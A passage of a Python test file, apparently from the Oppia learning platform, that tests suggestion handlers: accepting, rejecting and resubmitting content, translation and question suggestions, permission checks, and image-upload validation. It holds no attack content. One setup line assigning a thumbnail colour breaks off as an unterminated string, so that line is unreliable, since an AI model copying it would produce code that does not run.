increment_score_of_author_swap = self.swap(
suggestion_models, 'INCREMENT_SCORE_OF_AUTHOR_BY',
feconf.MINIMUM_SCORE_REQUIRED_TO_REVIEW)
with enable_recording_of_scores_swap, increment_score_of_author_swap:
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
exploration = exp_fetchers.get_exploration_by_id(self.EXP_ID)
self.assertEqual(
exploration.states[suggestion_to_accept[
'change']['state_name']].content.html,
suggestion_to_accept['change']['new_value']['html'])
self.logout()
# Testing user without permissions cannot accept.
self.login(self.NORMAL_USER_EMAIL)
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token, expected_status_int=401)
self.logout()
# Testing that author cannot accept own suggestion.
self.login(self.AUTHOR_EMAIL_2)
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token, expected_status_int=401)
# Testing users with scores above threshold can accept.
# The score of this author was increased to the review threshold amount
# when the editor accepted a suggestion that was authored by this user.
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
self.logout()
# Testing admins can accept suggestions.
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][1]
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][1]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
self.logout()
def test_suggestion_list_handler_with_invalid_query_field(self):
response = self.get_json(
'%s?invalid_query_field=value' % (
feconf.SUGGESTION_LIST_URL_PREFIX), expected_status_int=400)
self.assertEqual(
response['error'],
'Not allowed to query on field invalid_query_field')
def test_suggestion_list_handler(self):
suggestions = self.get_json(
'%s?author_id=%s&target_type=%s&target_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX, self.author_id_2,
feconf.ENTITY_TYPE_EXPLORATION, self.EXP_ID)
)['suggestions']
self.assertEqual(len(suggestions), 2)
def test_cannot_resubmit_suggestion_with_invalid_suggestion_id(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/resubmit/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, 'invalid_suggestion_id'), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'No suggestion found with given suggestion id')
def test_resubmit_rejected_suggestion(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion = suggestion_services.query_suggestions(
[('author_id', self.author_id), ('target_id', self.EXP_ID)])[0]
suggestion_services.reject_suggestion(
suggestion.suggestion_id, self.reviewer_id, 'reject message')
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/resubmit/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, suggestion.suggestion_id), {
'summary_message': 'summary message',
'action': u'resubmit',
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': self.resubmit_change_content,
'old_value': self.old_content
}
}, csrf_token=csrf_token)
suggestion = suggestion_services.query_suggestions(
[('author_id', self.author_id), ('target_id', self.EXP_ID)])[0]
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
self.assertEqual(
suggestion.change.new_value['html'],
self.resubmit_change_content['html'])
self.assertEqual(
suggestion.change.cmd, exp_domain.CMD_EDIT_STATE_PROPERTY)
self.assertEqual(
suggestion.change.property_name, exp_domain.STATE_PROPERTY_CONTENT)
self.assertEqual(
suggestion.change.state_name, 'State 1')
self.logout()
def test_translation_accept_suggestion_by_reviewer(self):
# Test reviewer can accept successfully.
self.login(self.REVIEWER_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.translator_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.translator_id))['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
self.logout()
def test_translation_suggestion_creation_with_new_images(self):
exp_id = '12345678exp1'
exploration = (
self.save_new_linear_exp_with_state_names_and_interactions(
exp_id, self.editor_id, ['State 1'],
['EndExploration'], category='Algebra'))
state_content_dict = {
'content_id': 'content',
'html': (
'<oppia-noninteractive-image filepath-with-value='
'""img.png"" caption-with-value="""" '
'alt-with-value=""Image"">'
'</oppia-noninteractive-image>')
}
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'img.png'),
'rb', encoding=None) as f:
raw_image = f.read()
self.post_json(
'%s/exploration/%s' % (self.IMAGE_UPLOAD_URL_PREFIX, exp_id),
{'filename': 'img.png'},
csrf_token=csrf_token,
upload_files=(('image', 'unused_filename', raw_image),))
exp_services.update_exploration(
self.editor_id, exp_id, [exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': state_content_dict
})], 'Changes content.')
rights_manager.publish_exploration(self.editor, exp_id)
exploration = exp_fetchers.get_exploration_by_id(exp_id)
text_to_translate = exploration.states['State 1'].content.html
self.logout()
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(feconf.ENTITY_TYPE_EXPLORATION, exp_id))
self.assertTrue(fs.isfile('image/img.png'))
self.login(self.TRANSLATOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': feconf.ENTITY_TYPE_EXPLORATION,
'target_id': exp_id,
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'State 1',
'content_id': 'content',
'language_code': 'hi',
'content_html': text_to_translate,
'translation_html': (
'<oppia-noninteractive-image filepath-with-value='
'""translation_image.png"" '
'caption-with-value="""" '
'alt-with-value=""Image"">'
'</oppia-noninteractive-image>')
},
}, csrf_token=csrf_token,
upload_files=(
('translation_image.png', 'translation_image.png', raw_image), )
)
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(
feconf.IMAGE_CONTEXT_EXPLORATION_SUGGESTIONS, exp_id))
self.assertTrue(fs.isfile('image/img.png'))
self.assertTrue(fs.isfile('image/img_compressed.png'))
self.assertTrue(fs.isfile('image/translation_image.png'))
self.assertTrue(fs.isfile('image/img_compressed.png'))
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.translator_id))['suggestions'][0]
self.logout()
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'Translated content of State 1',
'review_message': u'This looks good!',
}, csrf_token=csrf_token)
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(feconf.ENTITY_TYPE_EXPLORATION, exp_id))
self.assertTrue(fs.isfile('image/img.png'))
self.assertTrue(fs.isfile('image/translation_image.png'))
self.assertTrue(fs.isfile('image/img_compressed.png'))
class QuestionSuggestionTests(test_utils.GenericTestBase):
AUTHOR_EMAIL = 'author@example.com'
AUTHOR_EMAIL_2 = 'author2@example.com'
# Needs to be 12 characters long.
SKILL_ID = 'skill1234567'
SKILL_DESCRIPTION = 'skill to link question to'
def setUp(self):
super(QuestionSuggestionTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.save_new_skill(
self.SKILL_ID, self.admin_id, description=self.SKILL_DESCRIPTION)
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.SKILL_ID],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_query_question_suggestions(self):
suggestions = self.get_json(
'%s?suggestion_type=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
feconf.SUGGESTION_TYPE_ADD_QUESTION)
)['suggestions']
self.assertEqual(len(suggestions), 1)
suggestion = suggestions[0]
self.assertEqual(
suggestion['suggestion_type'],
feconf.SUGGESTION_TYPE_ADD_QUESTION)
self.assertEqual(suggestion['target_id'], self.SKILL_ID)
self.assertEqual(
suggestion['target_type'], feconf.ENTITY_TYPE_SKILL)
self.assertEqual(
suggestion['change']['cmd'],
question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION)
def test_accept_question_suggestion(self):
suggestion_to_accept = self.get_json(
'%s?suggestion_type=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
feconf.SUGGESTION_TYPE_ADD_QUESTION)
)['suggestions'][0]
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'This looks good!',
'skill_id': self.SKILL_ID
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?suggestion_type=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
feconf.SUGGESTION_TYPE_ADD_QUESTION)
)['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
(
questions, merged_question_skill_links, _) = (
question_services.get_displayable_question_skill_link_details(
1, [self.SKILL_ID], ''))
self.assertEqual(len(questions), 1)
self.assertEqual(
merged_question_skill_links[0].skill_descriptions,
[self.SKILL_DESCRIPTION])
self.assertEqual(
merged_question_skill_links[0].skill_difficulties, [0.3])
self.assertEqual(
questions[0].question_content,
self.question_dict['question_state_data']['content']['html']
)
thread_messages = feedback_services.get_messages(
suggestion_to_accept['suggestion_id'])
last_message = thread_messages[len(thread_messages) - 1]
self.assertEqual(last_message.text, 'This looks good!')
def test_suggestion_creation_with_valid_images(self):
self.save_new_skill(
'skill_id2', self.admin_id, description='description')
question_state_data_dict = self._create_valid_question_data(
'default_state').to_dict()
valid_html = (
'<oppia-noninteractive-math math_content-with-value="{&q'
'uot;raw_latex&quot;: &quot;(x - a_1)(x - a_2)(x - a'
'_3)...(x - a_n-1)(x - a_n)&quot;, &quot;svg_filenam'
'e&quot;: &quot;file.svg&quot;}"></oppia-noninte'
'ractive-math>'
)
question_state_data_dict['content']['html'] = valid_html
self.question_dict = {
'question_state_data': question_state_data_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id2'],
'inapplicable_skill_misconception_ids': []
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'),
'rb', encoding=None) as f:
raw_image = f.read()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token, upload_files=(
('file.svg', 'file.svg', raw_image), ))
self.logout()
def test_suggestion_creation_when_images_are_not_provided(self):
self.save_new_skill(
'skill_id2', self.admin_id, description='description')
question_state_data_dict = self._create_valid_question_data(
'default_state').to_dict()
valid_html = (
'<oppia-noninteractive-math math_content-with-value="{&q'
'uot;raw_latex&quot;: &quot;(x - a_1)(x - a_2)(x - a'
'_3)...(x - a_n-1)(x - a_n)&quot;, &quot;svg_filenam'
'e&quot;: &quot;file.svg&quot;}"></oppia-noninte'
'ractive-math>'
)
question_state_data_dict['content']['html'] = valid_html
self.question_dict = {
'question_state_data': question_state_data_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id2'],
'inapplicable_skill_misconception_ids': []
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertIn(
'No image data provided for file with name file.svg.',
response_dict['error'])
self.logout()
def test_suggestion_creation_when_images_are_not_valid(self):
self.save_new_skill(
'skill_id2', self.admin_id, description='description')
question_state_data_dict = self._create_valid_question_data(
'default_state').to_dict()
valid_html = (
'<oppia-noninteractive-math math_content-with-value="{&q'
'uot;raw_latex&quot;: &quot;(x - a_1)(x - a_2)(x - a'
'_3)...(x - a_n-1)(x - a_n)&quot;, &quot;svg_filenam'
'e&quot;: &quot;file.svg&quot;}"></oppia-noninte'
'ractive-math>'
)
question_state_data_dict['content']['html'] = valid_html
self.question_dict = {
'question_state_data': question_state_data_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id2'],
'inapplicable_skill_misconception_ids': []
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
large_image = '<svg><path d="%s" /></svg>' % (
'M150 0 L75 200 L225 200 Z ' * 4000)
response_dict = self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token,
upload_files=(
('file.svg', 'file.svg', large_image),),
expected_status_int=400)
self.assertIn(
'Image exceeds file size limit of 100 KB.',
response_dict['error'])
self.logout()
class SkillSuggestionTests(test_utils.GenericTestBase):
AUTHOR_EMAIL = 'author@example.com'
REVIEWER_EMAIL = 'reviewer@example.com'
def setUp(self):
super(SkillSuggestionTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
user_services.allow_user_to_review_question(self.reviewer_id)
self.skill_id = skill_services.get_new_skill_id()
self.save_new_skill(
self.skill_id, self.admin_id, description='Description')
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.skill_id],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.skill_id,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.skill_id,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_cannot_access_suggestion_to_skill_handler(self):
self.login(self.ADMIN_EMAIL)
thread_id = feedback_services.create_thread(
feconf.ENTITY_TYPE_QUESTION, self.skill_id,
self.author_id, 'description', '', has_suggestion=True)
csrf_token = self.get_new_csrf_token()
self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, self.skill_id,
thread_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.logout()
def test_suggestion_to_skill_handler_with_invalid_target_type(self):
self.login(self.ADMIN_EMAIL)
exp_id = 'new_exp_id'
self.save_new_default_exploration(exp_id, self.admin_id)
new_content = state_domain.SubtitledHtml(
'content', '<p>new content html</p>').to_dict()
change_cmd = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': new_content
}
suggestion_services.create_suggestion(
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT,
feconf.ENTITY_TYPE_EXPLORATION, exp_id, 1,
self.author_id, change_cmd, 'sample description')
suggestion_id = suggestion_services.query_suggestions(
[('author_id', self.author_id), (
'target_id', exp_id)])[0].suggestion_id
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
response = self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
self.skill_id, suggestion_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'This handler allows actions only on suggestions to skills.')
self.logout()
def test_suggestion_to_skill_handler_with_invalid_target_id(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
response = self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
'skill_id', suggestion_to_accept['suggestion_id']),
{
'action': u'reject',
'review_message': u'Rejected!'
},
csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'The skill id provided does not match the skill id '
'present as part of the suggestion_id')
self.logout()
def test_suggestion_to_skill_handler_with_invalid_action(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
response = self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']),
{'action': 'invalid_action'}, csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid action.')
self.logout()
def test_reject_suggestion_to_skill(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_reject = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_reject['target_id'],
suggestion_to_reject['suggestion_id']), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_REJECTED)
self.logout()
def test_accept_suggestion_to_skill(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted!',
'skill_id': self.skill_id
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_ACCEPTED)
self.logout()
def test_reviewer_accept_suggestion_to_skill(self):
self.login(self.REVIEWER_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted!',
'skill_id': self.skill_id
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_ACCEPTED)
self.logout()
class UserSubmittedSuggestionsHandlerTest(test_utils.GenericTestBase):
AUTHOR_EMAIL = 'author@example.com'
def setUp(self):
super(UserSubmittedSuggestionsHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.TOPIC_ID = 'topic'
self.STORY_ID = 'story'
self.EXP_ID = 'exp1'
# Needs to be 12 characters long.
self.SKILL_ID = 'skill1234567'
self.SKILL_DESCRIPTION = 'skill to link question to'
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.owner_id, title='Exploration title',
category='Algebra', end_state_name='End State',
correctness_feedback_enabled=True)
self.publish_exploration(self.owner_id, self.EXP_ID)
topic = topic_domain.Topic.create_default_topic(
self.TOPIC_ID, 'topic', 'abbrev', 'description')
topic.thumbnail_filename = 'thumbnail.svg'
topic.thumbnail_bg_color = '
topic.subtopics = [
topic_domain.Subtopic(
1, 'Title', ['skill_id_333'], 'image.svg',
constants.ALLOWED_THUMBNAIL_BG_COLORS['subtopic'][0],
'dummy-subtopic-three')]
topic.next_subtopic_id = 2
topic_services.save_new_topic(self.owner_id, topic)
topic_services.publish_topic(self.TOPIC_ID, self.admin_id)
story = story_domain.Story.create_default_story(
self.STORY_ID, 'A story', 'Description', self.TOPIC_ID, 'story-a')
story_services.save_new_story(self.owner_id, story)
topic_services.add_canonical_story(
self.owner_id, self.TOPIC_ID, self.STORY_ID)
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.admin_id)
story_services.update_story(
self.owner_id, self.STORY_ID, [story_domain.StoryChange({
'cmd': 'add_story_node',
'node_id': 'node_1',
'title': 'Node1',
}), story_domain.StoryChange({
'cmd': 'update_story_node_property',
'property_name': 'exploration_id',
'node_id': 'node_1',
'old_value': None,
'new_value': self.EXP_ID
})], 'Changes.')
self.save_new_skill(
self.SKILL_ID, self.owner_id, description=self.SKILL_DESCRIPTION)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.reviewer_id = self.editor_id
self.set_admins([self.ADMIN_USERNAME])
self.editor = user_services.UserActionsInfo(self.editor_id)
# Login and create exploration and suggestions.
self.login(self.EDITOR_EMAIL)
exp_services.update_exploration(
self.owner_id, self.EXP_ID, [
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'Introduction',
'new_value': {
'content_id': 'content',
'html': '<p>new content html</p>'
}
})], 'Add content')
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': (feconf.ENTITY_TYPE_EXPLORATION),
'target_id': self.EXP_ID,
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>new content html</p>',
'translation_html': '<p>new content html in Hindi</p>'
},
'description': 'Adds translation',
}, csrf_token=csrf_token)
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
